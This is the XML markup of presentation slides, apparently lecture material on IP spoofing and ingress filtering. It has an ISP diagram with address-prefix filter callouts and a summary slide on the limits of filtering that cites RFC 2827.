            <a:ext cx="1558925" cy="131921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4344" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="863600" y="3732213"/>
            <a:ext cx="1438275" cy="131921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4345" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016000" y="5602288"/>
            <a:ext cx="1381125" cy="131762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4346" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1092200" y="7358063"/>
            <a:ext cx="1393825" cy="131921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4347" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2387600" y="2776538"/>
            <a:ext cx="739775" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14348" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2247900" y="4006850"/>
            <a:ext cx="896938" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14349" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2370138" y="6292850"/>
            <a:ext cx="511175" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2439988" y="7785100"/>
            <a:ext cx="474662" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5535613" y="7343775"/>
            <a:ext cx="2492375" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14352" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="678341" y="2311400"/>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a:t>12.12.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14353" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="676753" y="3952875"/>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a:t>34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798197" y="5780088"/>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a:t>56.56.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14355" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="748191" y="7715250"/>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a:t>78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14356" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5172075" y="3957638"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14414" name="Group 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14416" name="Oval 21"/>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4417" name="Line 22"/>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4418" name="Line 23"/>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4419" name="Rectangle 24"/>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4420" name="Oval 25"/>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4421" name="Group 26"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14426" name="Line 2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4427" name="Line 2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4428" name="Line 2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4422" name="Group 30"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14423" name="Line 3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4424" name="Line 3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4425" name="Line 3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4415" name="Line 34"/>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4357" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7096125" y="3983038"/>
            <a:ext cx="563563" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14399" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14401" name="Oval 37"/>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4402" name="Line 38"/>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4403" name="Line 39"/>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4404" name="Rectangle 40"/>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4405" name="Oval 41"/>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4406" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14411" name="Line 4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4412" name="Line 4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4413" name="Line 4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4407" name="Group 46"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14408" name="Line 4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4409" name="Line 4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4410" name="Line 4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4400" name="Line 50"/>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4358" name="Group 51"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5002213" y="7251700"/>
            <a:ext cx="565150" cy="230188"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14384" name="Group 52"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14386" name="Oval 53"/>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4387" name="Line 54"/>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4388" name="Line 55"/>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4389" name="Rectangle 56"/>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4390" name="Oval 57"/>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4391" name="Group 58"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14396" name="Line 5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4397" name="Line 6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4398" name="Line 6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4392" name="Group 62"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14393" name="Line 6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4394" name="Line 6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4395" name="Line 6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4385" name="Line 66"/>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4359" name="Group 67"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7989888" y="7250113"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14369" name="Group 68"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14371" name="Oval 69"/>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4372" name="Line 70"/>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4373" name="Line 71"/>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4374" name="Rectangle 72"/>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4375" name="Oval 73"/>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4376" name="Group 74"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14381" name="Line 7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4382" name="Line 7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4383" name="Line 7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4377" name="Group 78"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14378" name="Line 7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4379" name="Line 8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4380" name="Line 8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4370" name="Line 82"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="14360" name="Line 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5761038" y="4059238"/>
            <a:ext cx="1373187" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14361" name="AutoShape 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7486650" y="2409825"/>
            <a:ext cx="2292350" cy="1233488"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46111"/>
              <a:gd name="adj2" fmla="val 64079"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter all but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>12.12.0.0/24 and 34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14362" name="AutoShape 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8229600" y="5683250"/>
            <a:ext cx="2311400" cy="1235075"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46111"/>
              <a:gd name="adj2" fmla="val 64079"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter all but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>56.56.0.0/24 and 78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14363" name="Text Box 86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1208088" y="2946400"/>
            <a:ext cx="1200150" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300">
              <a:alpha val="25098"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>34.34.1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14364" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2459038" y="3198813"/>
            <a:ext cx="296862" cy="0"/>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14365" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3487738" y="2925763"/>
            <a:ext cx="1325562" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>regional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14366" name="Text Box 89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3141663" y="6797675"/>
            <a:ext cx="1325562" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>regional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14367" name="Text Box 90"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7947025" y="4792663"/>
            <a:ext cx="1485900" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>tier-1 ISP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14368" name="Text Box 91"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10304463" y="2370138"/>
            <a:ext cx="2700337" cy="2070100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spoofed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packet gets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>through!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bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="914400"/>
            <a:ext cx="11703050" cy="9048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Ingress filtering: summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15365" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Effectiveness depends on widespread deployment at access ISPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deployment in upstream ISPs helps, but does not eliminate IP spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Filtering can impact router forwarding perf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Even if universally deployed at access, hacker can still spoof another address in its access network 12.12/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See RFC 2827 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
